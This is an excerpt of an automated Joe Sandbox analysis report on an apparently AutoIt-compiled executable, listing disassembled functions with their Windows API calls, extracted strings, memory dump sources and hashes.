                                                                                  • Instruction Fuzzy Hash: 1E514C71900709AFDB20DFA8ED8AF6EBBF5FF05705F004928E586A25A0C774A948DF10
                                                                                  Function 005479B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 005479C6
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 005479D1
                                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 005479DC
                                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 005479E7
                                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 005479F2
                                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 005479FD
                                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00547A08
                                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00547A13
                                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 00547A1E
                                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00547A29
                                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00547A34
                                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 00547A3F
                                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00547A4A
                                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00547A55
                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00547A60
                                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00547A6B
                                                                                  • GetCursorInfo.USER32(?), ref: 00547A7B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cursor$Load$Info
                                                                                  • String ID:
                                                                                  • API String ID: 2577412497-0
                                                                                  • Opcode ID: 2620328edc3e1e2a9ff2d1813b0fc8d772f8e264f55626a9ec4d75cd08b6dcd4
                                                                                  • Instruction ID: bb9df42800471d1c96ce7f67663887b9a297adc530f8261e19f1ed3982e722ff
                                                                                  • Opcode Fuzzy Hash: 2620328edc3e1e2a9ff2d1813b0fc8d772f8e264f55626a9ec4d75cd08b6dcd4
                                                                                  • Instruction Fuzzy Hash: E23105B1D4831E6ADB109FB69C8999FBFF8FF04754F50452AA50DE7280DB78A5008FA1
                                                                                  Function 004FC833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0050E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,004FC8B7,?,00002000,?,?,00000000,?,004F419E,?,?,?,0058DC00), ref: 0050E984
                                                                                    • Part of subcall function 004F660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004F53B1,?,?,004F61FF,?,00000000,00000001,00000000), ref: 004F662F
                                                                                  • __wsplitpath.LIBCMT ref: 004FC93E
                                                                                    • Part of subcall function 00511DFC: __wsplitpath_helper.LIBCMT ref: 00511E3C
                                                                                  • _wcscpy.LIBCMT ref: 004FC953
                                                                                  • _wcscat.LIBCMT ref: 004FC968
                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 004FC978
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 004FCABE
                                                                                    • Part of subcall function 004FB337: _wcscpy.LIBCMT ref: 004FB36F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                  • API String ID: 2258743419-1018226102
                                                                                  • Opcode ID: 438e1fe3da68a369fa608f18c3274b7f3c71d172dec888fa5d955cc32357b5f9
                                                                                  • Instruction ID: e77fbd02407061e049a441f576567a1e2c940da38881f73a72dc8042e6325c6e
                                                                                  • Opcode Fuzzy Hash: 438e1fe3da68a369fa608f18c3274b7f3c71d172dec888fa5d955cc32357b5f9
                                                                                  • Instruction Fuzzy Hash: CD12CF715083499FC724EF24C985AAFBBE4BFD9304F00491EF589932A1DB34EA49CB56
                                                                                  Function 0055CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0055CEFB
                                                                                  • DestroyWindow.USER32(?,?), ref: 0055CF73
                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0055CFF4
                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0055D016
                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0055D025
                                                                                  • DestroyWindow.USER32(?), ref: 0055D042
                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,004F0000,00000000), ref: 0055D075
                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0055D094
                                                                                  • GetDesktopWindow.USER32 ref: 0055D0A9
                                                                                  • GetWindowRect.USER32(00000000), ref: 0055D0B0
                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0055D0C2
                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0055D0DA
                                                                                    • Part of subcall function 0050B526: GetWindowLongW.USER32(?,000000EB), ref: 0050B537
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                  • String ID: 0$tooltips_class32
                                                                                  • API String ID: 3877571568-3619404913
                                                                                  • Opcode ID: 4d142e32a5b19eac6509fa9afef8ff3d340abcd0193ffe52119b72629591d8a9
                                                                                  • Instruction ID: a6d98bcb478dafe05a938f469f6069dba1c4be6fe5cab721a24420fdc4be8c02
                                                                                  • Opcode Fuzzy Hash: 4d142e32a5b19eac6509fa9afef8ff3d340abcd0193ffe52119b72629591d8a9
                                                                                  • Instruction Fuzzy Hash: 2F719A71140205AFD720CF28CC99FAA7BF5FB88704F54451EF9858B2A1E770E94ADB26
                                                                                  Function 0055F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0050B34E: GetWindowLongW.USER32(?,000000EB), ref: 0050B35F
                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 0055F37A
                                                                                    • Part of subcall function 0055D7DE: ClientToScreen.USER32(?,?), ref: 0055D807
                                                                                    • Part of subcall function 0055D7DE: GetWindowRect.USER32(?,?), ref: 0055D87D
                                                                                    • Part of subcall function 0055D7DE: PtInRect.USER32(?,?,0055ED5A), ref: 0055D88D
                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0055F3E3
                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0055F3EE
                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0055F411
                                                                                  • _wcscat.LIBCMT ref: 0055F441
                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0055F458
                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0055F471
                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0055F488
                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0055F4AA
                                                                                  • DragFinish.SHELL32(?), ref: 0055F4B1
                                                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0055F59C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                  • API String ID: 169749273-3440237614
                                                                                  • Opcode ID: 62f288632ae35f771eb4a4c39e061f1cf47011734db28cda09c2f2c4212370a4
                                                                                  • Instruction ID: 305d982ea6361b597518cc21cc930338504c03c091a3a339090ea9fc9ba8b2f6
                                                                                  • Opcode Fuzzy Hash: 62f288632ae35f771eb4a4c39e061f1cf47011734db28cda09c2f2c4212370a4
                                                                                  • Instruction Fuzzy Hash: 98616C71008305AFC710EF60DC89DAFBBF8BF99714F000A1EF695921A1DB70A949DB62
                                                                                  Function 0053AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(00000000), ref: 0053AB3D
                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 0053AB46
                                                                                  • VariantClear.OLEAUT32(?), ref: 0053AB52
                                                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0053AC40
                                                                                  • __swprintf.LIBCMT ref: 0053AC70
                                                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 0053AC9C
                                                                                  • VariantInit.OLEAUT32(?), ref: 0053AD4D
                                                                                  • SysFreeString.OLEAUT32(00000016), ref: 0053ADDF
                                                                                  • VariantClear.OLEAUT32(?), ref: 0053AE35
                                                                                  • VariantClear.OLEAUT32(?), ref: 0053AE44
                                                                                  • VariantInit.OLEAUT32(00000000), ref: 0053AE80
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                  • API String ID: 3730832054-3931177956
                                                                                  • Opcode ID: 4c2f001ba78ba49643eb6499ce2c66527bb73681c2af59dc5a3bbe37ca6184ba
                                                                                  • Instruction ID: d8303b59d9cd3e8351508c4d0c8b30e023dbce301e682b402b4b372046324e58
                                                                                  • Opcode Fuzzy Hash: 4c2f001ba78ba49643eb6499ce2c66527bb73681c2af59dc5a3bbe37ca6184ba
                                                                                  • Instruction Fuzzy Hash: 93D1E171A0020ADBDB209F65D899B7EFFB9FF84700F148855E4859B191DB74EC40EBA2
                                                                                  Function 0055716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?), ref: 005571FC
                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00557247
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                  • API String ID: 3974292440-4258414348
                                                                                  • Opcode ID: bf530028ef5bf4a67c4992ecaf86b79cf154ac54832494afd0b0efe2d9320a5c
                                                                                  • Instruction ID: 68bf77bca3eb8f086dda8dd78117c9a25cc0fde263fa9c44c146bb87a7d918ef
                                                                                  • Opcode Fuzzy Hash: bf530028ef5bf4a67c4992ecaf86b79cf154ac54832494afd0b0efe2d9320a5c
                                                                                  • Instruction Fuzzy Hash: 7D916C342046069BCB04EF10D851A6EBFA1BF99314F10485EBD966B3A2DB75ED0ACB85
                                                                                  Function 0052CB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • EnumChildWindows.USER32(?,0052CF50), ref: 0052CE90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ChildEnumWindows
                                                                                  • String ID: 4+Z$CLASS$CLASSNN$H+Z$INSTANCE$L+Z$NAME$P+Z$REGEXPCLASS$T+Z$TEXT
                                                                                  • API String ID: 3555792229-2646979935
                                                                                  • Opcode ID: 995030153d7de0a534cf28b7fd6fe637a1e96b5ee4c2cccd658ab2a3ef8fec7a
                                                                                  • Instruction ID: 4efafa41ebd7f1f77cea85a064ad87409eb311a936a900bcceb3912bd59347e4
                                                                                  • Opcode Fuzzy Hash: 995030153d7de0a534cf28b7fd6fe637a1e96b5ee4c2cccd658ab2a3ef8fec7a
                                                                                  • Instruction Fuzzy Hash: C891A13060051AABDB19DF60D482BEEFFB9BF06300F518519E959A71C2DF306999DBE0
                                                                                  Function 0055E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0055E5AB
                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0055BEAF), ref: 0055E607
                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0055E647
                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0055E68C
                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0055E6C3
                                                                                  • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0055BEAF), ref: 0055E6CF
                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0055E6DF
                                                                                  • DestroyIcon.USER32(?,?,?,?,?,0055BEAF), ref: 0055E6EE
                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0055E70B
                                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0055E717
                                                                                    • Part of subcall function 00510FA7: __wcsicmp_l.LIBCMT ref: 00511030
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                  • String ID: .dll$.exe$.icl
                                                                                  • API String ID: 1212759294-1154884017
                                                                                  • Opcode ID: 35230958a738a828cc606b00f83257d842a1f09959b3c6fae8fb7cd1254d25c9
                                                                                  • Instruction ID: ceb88c1429233feddb234b5caf1385b840200ee1c5e5799849ba1c3da3e35014
                                                                                  • Opcode Fuzzy Hash: 35230958a738a828cc606b00f83257d842a1f09959b3c6fae8fb7cd1254d25c9
                                                                                  • Instruction Fuzzy Hash: 9261D271500219BAEB18DF64DC46FFE7BB8BF18765F104106F915E60D0EBB4AA84DBA0
                                                                                  Function 0053D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004F936C: __swprintf.LIBCMT ref: 004F93AB
                                                                                    • Part of subcall function 004F936C: __itow.LIBCMT ref: 004F93DF
                                                                                  • CharLowerBuffW.USER32(?,?), ref: 0053D292
                                                                                  • GetDriveTypeW.KERNEL32 ref: 0053D2DF
                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0053D327
                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0053D35E
                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0053D38C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                  • API String ID: 1148790751-4113822522
                                                                                  • Opcode ID: 8c13e5e7ce9510562be13b3be835f07cc764f81d323e008153977a2ab7f90143
                                                                                  • Instruction ID: c629f30c3522d5823eaf07e716d25d2379238d738951b9b98cfba59d85e2a338
                                                                                  • Opcode Fuzzy Hash: 8c13e5e7ce9510562be13b3be835f07cc764f81d323e008153977a2ab7f90143
                                                                                  • Instruction Fuzzy Hash: 02514A71504209AFC700EF11D98196EBBF4FF99718F10485DF985672A1DB35EE0ACB92
                                                                                  Function 005326BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00563973,00000016,0000138C,00000016,?,00000016,0058DDB4,00000000,?), ref: 005326F1
                                                                                  • LoadStringW.USER32(00000000,?,00563973,00000016), ref: 005326FA
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00563973,00000016,0000138C,00000016,?,00000016,0058DDB4,00000000,?,00000016), ref: 0053271C
                                                                                  • LoadStringW.USER32(00000000,?,00563973,00000016), ref: 0053271F
                                                                                  • __swprintf.LIBCMT ref: 0053276F
                                                                                  • __swprintf.LIBCMT ref: 00532780
                                                                                  • _wprintf.LIBCMT ref: 00532829
                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00532840
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                  • API String ID: 618562835-2268648507
                                                                                  • Opcode ID: 39deaea17d6aace9a488bfca486695035f53fa27a81c1f61464cde8d68d89c06
                                                                                  • Instruction ID: d87bca9b63c8d8c549e8866c3458d2190668aad68b4ebb517b7adef96fe50a67
                                                                                  • Opcode Fuzzy Hash: 39deaea17d6aace9a488bfca486695035f53fa27a81c1f61464cde8d68d89c06
                                                                                  • Instruction Fuzzy Hash: 35414F7280061DBACB14FBD1DE86DFEB778BF55348F10006AB60176092EA346F49DBA4
                                                                                  Function 0053D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0053D0D8
                                                                                  • __swprintf.LIBCMT ref: 0053D0FA
                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0053D137
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0053D15C
                                                                                  • _memset.LIBCMT ref: 0053D17B
                                                                                  • _wcsncpy.LIBCMT ref: 0053D1B7
                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0053D1EC
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0053D1F7
                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 0053D200
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0053D20A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                  • String ID: :$\$\??\%s
                                                                                  • API String ID: 2733774712-3457252023
                                                                                  • Opcode ID: 0f6a0980247caf8961fc1dc7958edc2f6fdbc84d15977a923baebae58ca15a93
                                                                                  • Instruction ID: 4a4a939a22fad8d79f1e2047301ed6038a252053eb37e773a0a9020f5bf9baa0
                                                                                  • Opcode Fuzzy Hash: 0f6a0980247caf8961fc1dc7958edc2f6fdbc84d15977a923baebae58ca15a93
                                                                                  • Instruction Fuzzy Hash: 1131607690010AABDB21DFA0EC49FEB7BBDBF89740F1040B5F509D21A1E77096859B34
                                                                                  Function 0055E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0055BEF4,?,?), ref: 0055E754
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0055BEF4,?,?,00000000,?), ref: 0055E76B
                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0055BEF4,?,?,00000000,?), ref: 0055E776
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,0055BEF4,?,?,00000000,?), ref: 0055E783
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0055E78C
                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0055BEF4,?,?,00000000,?), ref: 0055E79B
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0055E7A4
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,0055BEF4,?,?,00000000,?), ref: 0055E7AB
                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0055BEF4,?,?,00000000,?), ref: 0055E7BC
